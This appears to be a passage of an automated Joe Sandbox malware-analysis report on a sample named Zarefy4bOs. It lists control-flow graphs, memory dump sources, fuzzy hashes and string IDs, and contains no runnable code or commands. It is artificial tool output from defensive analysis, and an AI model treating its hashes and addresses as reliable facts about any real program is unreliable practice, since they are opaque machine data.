                                                                      control_flow_graph 1695 266bc32-266bc35 1696 266bca6 1695->1696 1697 266bc37-266bc39 1695->1697 1698 266bca7-266bca8 1696->1698 1699 266bc90-266bca2 1696->1699 1700 266bcaa-266bd44 call 2663960 call 2663480 1697->1700 1701 266bc3b-266bc60 1697->1701 1698->1700 1699->1696 1713 266bd46 1700->1713 1714 266bd4b-266bd6c call 2664e20 1700->1714 1702 266bc67-266bc8f 1701->1702 1703 266bc62 1701->1703 1702->1699 1703->1702 1713->1714 1716 266bd71-266bd7c 1714->1716 1717 266bd83-266be93 1716->1717 1718 266bd7e 1716->1718 1728 266be95-266beaa 1717->1728 1729 266beab 1717->1729 1718->1717 1728->1729
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$PH]q$PH]q
                                                                      • API String ID: 0-2023588385
                                                                      • Opcode ID: 8eed73ef78b65c68debd0f72a15966b4117226561597fa46230b93493a7e328f
                                                                      • Instruction ID: f81d17883882ae5834932c4e943ffe43e2f3939d3b1d439dd7a18d7109db766c
                                                                      • Opcode Fuzzy Hash: 8eed73ef78b65c68debd0f72a15966b4117226561597fa46230b93493a7e328f
                                                                      • Instruction Fuzzy Hash: 1871F774E00648DFDB18DFAAD984AADBBF2FF89314F148069E904AB365DB315942CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1732 266b552-266b580 1733 266b587-266b664 call 2663960 call 2663480 1732->1733 1734 266b582 1732->1734 1744 266b666 1733->1744 1745 266b66b-266b68c call 2664e20 1733->1745 1734->1733 1744->1745 1747 266b691-266b69c 1745->1747 1748 266b6a3-266b6a7 1747->1748 1749 266b69e 1747->1749 1750 266b6ac-266b6b3 1748->1750 1751 266b6a9-266b6aa 1748->1751 1749->1748 1753 266b6b5 1750->1753 1754 266b6ba-266b6c8 1750->1754 1752 266b6cb-266b70f 1751->1752 1758 266b775-266b78c 1752->1758 1753->1754 1754->1752 1760 266b711-266b727 1758->1760 1761 266b78e-266b7b3 1758->1761 1765 266b751 1760->1765 1766 266b729-266b735 1760->1766 1767 266b7b5-266b7ca 1761->1767 1768 266b7cb 1761->1768 1771 266b757-266b774 1765->1771 1769 266b737-266b73d 1766->1769 1770 266b73f-266b745 1766->1770 1767->1768 1774 266b7cc 1768->1774 1772 266b74f 1769->1772 1770->1772 1771->1758 1772->1771 1774->1774
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$PH]q$PH]q
                                                                      • API String ID: 0-2023588385
                                                                      • Opcode ID: daf8d3e2d734c12f78c35dcdd6ecd512d3901728350a630adbab5a6878a33a42
                                                                      • Instruction ID: 1f68203adc713eba8204e30320016b4c89b9e689e04e12873c25ae63d0e0bed1
                                                                      • Opcode Fuzzy Hash: daf8d3e2d734c12f78c35dcdd6ecd512d3901728350a630adbab5a6878a33a42
                                                                      • Instruction Fuzzy Hash: BA61D574E00608DFDB18DFAAD994AADBBF2BF88300F14C069E805AB365DB349941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K
                                                                      • API String ID: 0-856455061
                                                                      • Opcode ID: 9d33aa9e9ed8030d7586e705b5034a58d418b3dde6c47f2f90c636cc11c7322a
                                                                      • Instruction ID: 114150eae62809d801b05b76e6d8ea63da7b219232395e10dca74c876be7c7a7
                                                                      • Opcode Fuzzy Hash: 9d33aa9e9ed8030d7586e705b5034a58d418b3dde6c47f2f90c636cc11c7322a
                                                                      • Instruction Fuzzy Hash: 6233D431C146198EDB11EF68C854AADFBB1FF99300F54D69AE44877221EB70AAD4CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$4']q
                                                                      • API String ID: 0-176817397
                                                                      • Opcode ID: 8ee39ba017293f9f34fe3ef9c75bf51ad3917ab3e78bd13ae4a0eeb9242afd46
                                                                      • Instruction ID: 7a35f75be59fb3680a1dd66c1b0cfdf2249dcd8348986909c91588c35608314a
                                                                      • Opcode Fuzzy Hash: 8ee39ba017293f9f34fe3ef9c75bf51ad3917ab3e78bd13ae4a0eeb9242afd46
                                                                      • Instruction Fuzzy Hash: 53725B70A00209DFCB15CFA8C588ABEBBF6BF89304F298559E845AB365D731ED51CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$Haq
                                                                      • API String ID: 0-903699183
                                                                      • Opcode ID: 449c7e95f372d0d979e1468aa3e50d9dfc200370c8909a12c9a27702dd9dc95b
                                                                      • Instruction ID: 3d25557ede5bf4006e8f7555dfab168dcac61b838ff6e8169258dcc0b8840241
                                                                      • Opcode Fuzzy Hash: 449c7e95f372d0d979e1468aa3e50d9dfc200370c8909a12c9a27702dd9dc95b
                                                                      • Instruction Fuzzy Hash: F0128070A002198FCB18DF69D954ABEBBFAFF88304F248559E505DB395DB349D42CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 289bc797f057a44cd0e651434c5023a0dcbd174ddaffd8fb363b3d64c11652fc
                                                                      • Instruction ID: 70de075145d1053b55276872fb09ebe93d9a8c2121a03487943f37d4cac29dd0
                                                                      • Opcode Fuzzy Hash: 289bc797f057a44cd0e651434c5023a0dcbd174ddaffd8fb363b3d64c11652fc
                                                                      • Instruction Fuzzy Hash: C7222B70E002198FDB18DFA9C984BADFBB2FF88344F1485A9D809AB355DB319985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K
                                                                      • API String ID: 0-856455061
                                                                      • Opcode ID: 564bb5b85ff7dd13c266aeac806ca14003cd32b925c5a78f10a3473a93f1bb63
                                                                      • Instruction ID: fadb698c044fd616a64bbafcef4cce115dc6bbb8ed2adbd391644ea3bea54eca
                                                                      • Opcode Fuzzy Hash: 564bb5b85ff7dd13c266aeac806ca14003cd32b925c5a78f10a3473a93f1bb63
                                                                      • Instruction Fuzzy Hash: 37F19171C05A488FCB25DF69C8987FEBBB1EF49304F18C19AD85867252E7349989CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb390687813dfdb1701e06db7517f7276f2050057ccbaf86b1a920909282cfd3
                                                                      • Instruction ID: df225c781a2fe7b2f4934dca68187f6d4362aa2a316ee94aa41f34ecdb4a5914
                                                                      • Opcode Fuzzy Hash: cb390687813dfdb1701e06db7517f7276f2050057ccbaf86b1a920909282cfd3
                                                                      • Instruction Fuzzy Hash: 2A72CD74E012298FDB65DF69D984BEDBBB2BB49304F1481E9D409A7355DB30AE82CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f598481f665c8654fd48c24257400af52a6f45ea7b8d611042023506617081b9
                                                                      • Instruction ID: f1bcf08f5782d14a369483cc3c7771e375bc89c7d1ee6377da36b89a2f4c3ef6
                                                                      • Opcode Fuzzy Hash: f598481f665c8654fd48c24257400af52a6f45ea7b8d611042023506617081b9
                                                                      • Instruction Fuzzy Hash: 18D1B174E01218CFDB14DFA5D994BADBBB2BF89300F2084A9D809AB365DB355E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13abb9cc2d9636cdb9f5229100f215d9d2e304e979a584b03794132efdd9e334
                                                                      • Instruction ID: 5f63feb1f3760c55af7b62305dfdc8b93fb5c4f44b97094fcf1dae68b60b44a9
                                                                      • Opcode Fuzzy Hash: 13abb9cc2d9636cdb9f5229100f215d9d2e304e979a584b03794132efdd9e334
                                                                      • Instruction Fuzzy Hash: D6C1A374E00218CFDB14DFA5D958BADBBB2BF89300F2084A9D809AB355DB355E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95d62b872d2a7c85cbc68208574853c4b9dba3e9426c210d684b77f1b198bc68
                                                                      • Instruction ID: f0fdc1ae123febe70484a411e7af07a3d0ce9715e5cdd683486a51c4abbb0e20
                                                                      • Opcode Fuzzy Hash: 95d62b872d2a7c85cbc68208574853c4b9dba3e9426c210d684b77f1b198bc68
                                                                      • Instruction Fuzzy Hash: BFA1F470D002088FDB14DFA9C588BEDBBB1FF89304F249269E409A7391DB759985CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26f71d82ebace3b731109b3f84533230d2817b73259fe8e70460d95350487333
                                                                      • Instruction ID: 2a36cbc376bcc49aa6163d5904ebc7fe6078aaeac044a819a06fc41dad17ee99
                                                                      • Opcode Fuzzy Hash: 26f71d82ebace3b731109b3f84533230d2817b73259fe8e70460d95350487333
                                                                      • Instruction Fuzzy Hash: 36A1F270E002088FEB14DFA9C588BEDBBB1FF88314F249269E409A7391DB759985CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9cd58aa458a43cff7a0c7b894264184454779095de97dd1b0b292ec4000979cf
                                                                      • Instruction ID: 349581bf45ed84f0606c69e04a389c2b6b17802e9c97813bc8f02c0f793ccb63
                                                                      • Opcode Fuzzy Hash: 9cd58aa458a43cff7a0c7b894264184454779095de97dd1b0b292ec4000979cf
                                                                      • Instruction Fuzzy Hash: 8791F170D00218CFEB10DFA9C488BEDBBB1BF49314F649269E409AB392DB759985CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93522387de8dfc75c850037d2ffd2bf1c97cb7cb7adf43d1d2c02783388992c1
                                                                      • Instruction ID: 8067ee02fbe63172796d2f54537be870198f90ff57820dbcb1d59f089ce7cee6
                                                                      • Opcode Fuzzy Hash: 93522387de8dfc75c850037d2ffd2bf1c97cb7cb7adf43d1d2c02783388992c1
                                                                      • Instruction Fuzzy Hash: 0D41E274E00208CFDB18DFAAD9586EDBBF2AF89300F24D12AD819AB354DB355946CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 2666eb8-2666eed 1 2666ef3-2666f16 0->1 2 266731c-2667320 0->2 11 2666fc4-2666fc8 1->11 12 2666f1c-2666f29 1->12 3 2667322-2667336 2->3 4 2667339-2667347 2->4 9 26673b8-26673cd 4->9 10 2667349-266735e 4->10 17 26673d4-26673e1 9->17 18 26673cf-26673d2 9->18 19 2667365-2667372 10->19 20 2667360-2667363 10->20 15 2667010-2667019 11->15 16 2666fca-2666fd8 11->16 28 2666f2b-2666f36 12->28 29 2666f38 12->29 21 266742f 15->21 22 266701f-2667029 15->22 16->15 36 2666fda-2666ff5 16->36 24 26673e3-266741e 17->24 18->24 25 2667374-26673b5 19->25 20->25 30 2667434-2667464 21->30 22->2 26 266702f-2667038 22->26 77 2667425-266742c 24->77 34 2667047-2667053 26->34 35 266703a-266703f 26->35 31 2666f3a-2666f3c 28->31 29->31 51 2667466-266747c 30->51 52 266747d-2667484 30->52 31->11 38 2666f42-2666fa4 31->38 34->30 41 2667059-266705f 34->41 35->34 60 2666ff7-2667001 36->60 61 2667003 36->61 86 2666fa6 38->86 87 2666faa-2666fc1 38->87 43 2667306-266730a 41->43 44 2667065-2667075 41->44 43->21 48 2667310-2667316 43->48 58 2667077-2667087 44->58 59 2667089-266708b 44->59 48->2 48->26 62 266708e-2667094 58->62 59->62 63 2667005-2667007 60->63 61->63 62->43 67 266709a-26670a9 62->67 63->15 68 2667009 63->68 72 2667157-2667182 call 2666d00 * 2 67->72 73 26670af 67->73 68->15 90 266726c-2667286 72->90 91 2667188-266718c 72->91 75 26670b2-26670c3 73->75 75->30 79 26670c9-26670db 75->79 79->30 81 26670e1-26670f9 79->81 144 26670fb call 2667488 81->144 145 26670fb call 2667498 81->145 85 2667101-2667111 85->43 89 2667117-266711a 85->89 86->87 87->11 92 2667124-2667127 89->92 93 266711c-2667122 89->93 90->2 113 266728c-2667290 90->113 91->43 95 2667192-2667196 91->95 92->21 96 266712d-2667130 92->96 93->92 93->96 98 26671be-26671c4 95->98 99 2667198-26671a5 95->99 100 2667132-2667136 96->100 101 2667138-266713b 96->101 103 26671c6-26671ca 98->103 104 26671ff-2667205 98->104 116 26671a7-26671b2 99->116 117 26671b4 99->117 100->101 102 2667141-2667145 100->102 101->21 101->102 102->21 105 266714b-2667151 102->105 103->104 106 26671cc-26671d5 103->106 107 2667207-266720b 104->107 108 2667211-2667217 104->108 105->72 105->75 111 26671d7-26671dc 106->111 112 26671e4-26671fa 106->112 107->77 107->108 114 2667223-2667225 108->114 115 2667219-266721d 108->115 111->112 112->43 121 2667292-266729c call 2665ba8 113->121 122 26672cc-26672d0 113->122 118 2667227-2667230 114->118 119 266725a-266725c 114->119 115->43 115->114 120 26671b6-26671b8 116->120 117->120 124 2667232-2667237 118->124 125 266723f-2667255 118->125 119->43 126 2667262-2667269 119->126 120->43 120->98 121->122 132 266729e-26672b3 121->132 122->77 128 26672d6-26672da 122->128 124->125 125->43 128->77 131 26672e0-26672ed 128->131 135 26672ef-26672fa 131->135 136 26672fc 131->136 132->122 141 26672b5-26672ca 132->141 138 26672fe-2667300 135->138 136->138 138->43 138->77 141->2 141->122 144->85 145->85
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                      • API String ID: 0-1435242062
                                                                      • Opcode ID: 77b8a82660fbcd21f9ca72a7951a8929631ee0e7119354ec5aa330c220b3a30e
                                                                      • Instruction ID: d3a8d5578685a254758efcd012a2b9635c14e8fa18f45e3f7ed6f61c648a12cf
                                                                      • Opcode Fuzzy Hash: 77b8a82660fbcd21f9ca72a7951a8929631ee0e7119354ec5aa330c220b3a30e
                                                                      • Instruction Fuzzy Hash: AD125B30A002498FCB16CF69D988AAEBBF6FF48318F148599E855DB365D730ED41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1505 2668849-2668865 1506 2668867-266886c 1505->1506 1507 2668871-266887d 1505->1507 1508 2668c06-2668c0b 1506->1508 1510 266887f-2668881 1507->1510 1511 266888d-2668892 1507->1511 1512 2668889-266888b 1510->1512 1511->1508 1512->1511 1513 2668897-26688a3 1512->1513 1515 26688a5-26688b1 1513->1515 1516 26688b3-26688b8 1513->1516 1515->1516 1518 26688bd-26688c8 1515->1518 1516->1508 1520 2668972-266897d 1518->1520 1521 26688ce-26688d9 1518->1521 1526 2668983-2668992 1520->1526 1527 2668a20-2668a2c 1520->1527 1524 26688ef 1521->1524 1525 26688db-26688ed 1521->1525 1528 26688f4-26688f6 1524->1528 1525->1528 1534 2668994-266899e 1526->1534 1535 26689a3-26689b2 1526->1535 1536 2668a2e-2668a3a 1527->1536 1537 2668a3c-2668a4e 1527->1537 1530 2668916-266891b 1528->1530 1531 26688f8-2668907 1528->1531 1530->1508 1531->1530 1542 2668909-2668914 1531->1542 1534->1508 1544 26689d6-26689df 1535->1544 1545 26689b4-26689c0 1535->1545 1536->1537 1546 2668a7c-2668a87 1536->1546 1549 2668a72-2668a77 1537->1549 1550 2668a50-2668a5c 1537->1550 1542->1530 1553 2668920-2668929 1542->1553 1559 26689f5 1544->1559 1560 26689e1-26689f3 1544->1560 1555 26689c2-26689c7 1545->1555 1556 26689cc-26689d1 1545->1556 1557 2668a8d-2668a96 1546->1557 1558 2668b69-2668b74 1546->1558 1549->1508 1569 2668a5e-2668a63 1550->1569 1570 2668a68-2668a6d 1550->1570 1564 2668935-2668944 1553->1564 1565 266892b-2668930 1553->1565 1555->1508 1556->1508 1574 2668aac 1557->1574 1575 2668a98-2668aaa 1557->1575 1572 2668b76-2668b80 1558->1572 1573 2668b9e-2668bad 1558->1573 1561 26689fa-26689fc 1559->1561 1560->1561 1561->1527 1567 26689fe-2668a0a 1561->1567 1581 2668946-2668952 1564->1581 1582 2668968-266896d 1564->1582 1565->1508 1585 2668a16-2668a1b 1567->1585 1586 2668a0c-2668a11 1567->1586 1569->1508 1570->1508 1591 2668b97-2668b9c 1572->1591 1592 2668b82-2668b8e 1572->1592 1588 2668c01 1573->1588 1589 2668baf-2668bbe 1573->1589 1577 2668ab1-2668ab3 1574->1577 1575->1577 1583 2668ab5-2668ac1 1577->1583 1584 2668ac3 1577->1584 1598 2668954-2668959 1581->1598 1599 266895e-2668963 1581->1599 1582->1508 1590 2668ac8-2668aca 1583->1590 1584->1590 1585->1508 1586->1508 1588->1508 1589->1588 1601 2668bc0-2668bd8 1589->1601 1595 2668ad6-2668ae9 1590->1595 1596 2668acc-2668ad1 1590->1596 1591->1508 1592->1591 1603 2668b90-2668b95 1592->1603 1604 2668b21-2668b2b 1595->1604 1605 2668aeb 1595->1605 1596->1508 1598->1508 1599->1508 1616 2668bfa-2668bff 1601->1616 1617 2668bda-2668bf8 1601->1617 1603->1508 1612 2668b2d-2668b39 call 26682b8 1604->1612 1613 2668b4a-2668b56 1604->1613 1607 2668aee-2668aff call 26682b8 1605->1607 1614 2668b06-2668b0b 1607->1614 1615 2668b01-2668b04 1607->1615 1627 2668b40-2668b45 1612->1627 1628 2668b3b-2668b3e 1612->1628 1622 2668b5f 1613->1622 1623 2668b58-2668b5d 1613->1623 1614->1508 1615->1614 1619 2668b10-2668b13 1615->1619 1616->1508 1617->1508 1624 2668c0c-2668c34 1619->1624 1625 2668b19-2668b1f 1619->1625 1629 2668b64 1622->1629 1623->1629 1632 2668c36-2668c3b 1624->1632 1633 2668c40-2668c4b 1624->1633 1625->1604 1625->1607 1627->1508 1628->1613 1628->1627 1629->1508 1634 2668dc1-2668dc5 1632->1634 1637 2668cf3-2668cfc 1633->1637 1638 2668c51-2668c5c 1633->1638 1641 2668d47-2668d52 1637->1641 1642 2668cfe-2668d09 1637->1642 1643 2668c72 1638->1643 1644 2668c5e-2668c70 1638->1644 1651 2668d54-2668d66 1641->1651 1652 2668d68 1641->1652 1653 2668dbf 1642->1653 1654 2668d0f-2668d21 1642->1654 1645 2668c77-2668c79 1643->1645 1644->1645 1646 2668cae-2668cc0 1645->1646 1647 2668c7b-2668c8a 1645->1647 1646->1653 1662 2668cc6-2668cd4 1646->1662 1647->1646 1658 2668c8c-2668ca2 1647->1658 1656 2668d6d-2668d6f 1651->1656 1652->1656 1653->1634 1654->1653 1663 2668d27-2668d2b 1654->1663 1656->1653 1660 2668d71-2668d80 1656->1660 1658->1646 1682 2668ca4-2668ca9 1658->1682 1673 2668d82-2668d8b 1660->1673 1674 2668da8 1660->1674 1669 2668cd6-2668cdb 1662->1669 1670 2668ce0-2668ce3 1662->1670 1667 2668d37-2668d3a 1663->1667 1668 2668d2d-2668d32 1663->1668 1671 2668dc6-2668df6 call 26683d8 1667->1671 1672 2668d40-2668d43 1667->1672 1668->1634 1669->1634 1670->1671 1676 2668ce9-2668cec 1670->1676 1692 2668e0d-2668e11 1671->1692 1693 2668df8-2668e0c 1671->1693 1672->1663 1675 2668d45 1672->1675 1684 2668da1 1673->1684 1685 2668d8d-2668d9f 1673->1685 1677 2668dad-2668daf 1674->1677 1675->1653 1676->1662 1680 2668cee 1676->1680 1677->1653 1681 2668db1-2668dbd 1677->1681 1680->1653 1681->1634 1682->1634 1687 2668da6 1684->1687 1685->1687 1687->1677
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$;]q
                                                                      • API String ID: 0-1096896373
                                                                      • Opcode ID: 41297a751227a282dd916ebcef4ea930e2e51cbb9ad49122b9e7bb67fb0ecf79
                                                                      • Instruction ID: 0c92da73f1bf252acd9695c25a86f4334fb921ae847c275f08d95e9278e27088
                                                                      • Opcode Fuzzy Hash: 41297a751227a282dd916ebcef4ea930e2e51cbb9ad49122b9e7bb67fb0ecf79
                                                                      • Instruction Fuzzy Hash: 9BF1A270345601CFDB195B39C96CB3D77A6AF85744F1844AAE502CF3A1EB29CC8AC791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q$$]q
                                                                      • API String ID: 0-127220927
                                                                      • Opcode ID: a6c887c2f760fcd059df55f5f183f6786ec6f48c4c7ea7d247f4900171089242
                                                                      • Instruction ID: 918014b095f0400d222ab08623b863bf98e4c8e16b04f1ce360d34fb9126265d
                                                                      • Opcode Fuzzy Hash: a6c887c2f760fcd059df55f5f183f6786ec6f48c4c7ea7d247f4900171089242
                                                                      • Instruction Fuzzy Hash: 27525274A002188FEB159FA4C960BAFBB76EF84300F1080ADD50A6B765CF395E45DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Haq$Haq
                                                                      • API String ID: 0-4016896955
                                                                      • Opcode ID: 4bb44f69846105b4708fde41e1d8d1613aad802c77ec55234c47f2c8cf84632a
                                                                      • Instruction ID: 505f4ba1bd60e0ac8a65c1238cfd03ce4709f9f9b1c642415259124e2e613d41
                                                                      • Opcode Fuzzy Hash: 4bb44f69846105b4708fde41e1d8d1613aad802c77ec55234c47f2c8cf84632a
                                                                      • Instruction Fuzzy Hash: C2B1BD307042558FCB299F78C899B7E7BA2AF88314F548969E847CB391DB35DC42CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,aq$,aq
                                                                      • API String ID: 0-2990736959
                                                                      • Opcode ID: 3aba882fec4cba7849c6f7b98d6ff5737334e69931dedd1ca7a8a8eacbca629c
                                                                      • Instruction ID: 2a11dd626895d5d2f4ebc0bc835ae4e81bae0765a0f2699b7938c72fd3a0ee34
                                                                      • Opcode Fuzzy Hash: 3aba882fec4cba7849c6f7b98d6ff5737334e69931dedd1ca7a8a8eacbca629c
                                                                      • Instruction Fuzzy Hash: 2A817E34A00505CFCB18DFA9C88DA7AB7B2FF88314FA58169D416DB3A5D731E842CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR]q
                                                                      • API String ID: 0-3081347316
                                                                      • Opcode ID: 46ca3d657d220d136f2231aef7387d091ba5906092659d0c507bb57ecf987419
                                                                      • Instruction ID: 20fb0a58befe6d5f28a867500d516643253c74b0eacba5d55255549caab9be1a
                                                                      • Opcode Fuzzy Hash: 46ca3d657d220d136f2231aef7387d091ba5906092659d0c507bb57ecf987419
                                                                      • Instruction Fuzzy Hash: 91221C78900619CFCB55EF68ED94A9DBBB2FF88300F1089A9D409A7369DB706D85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
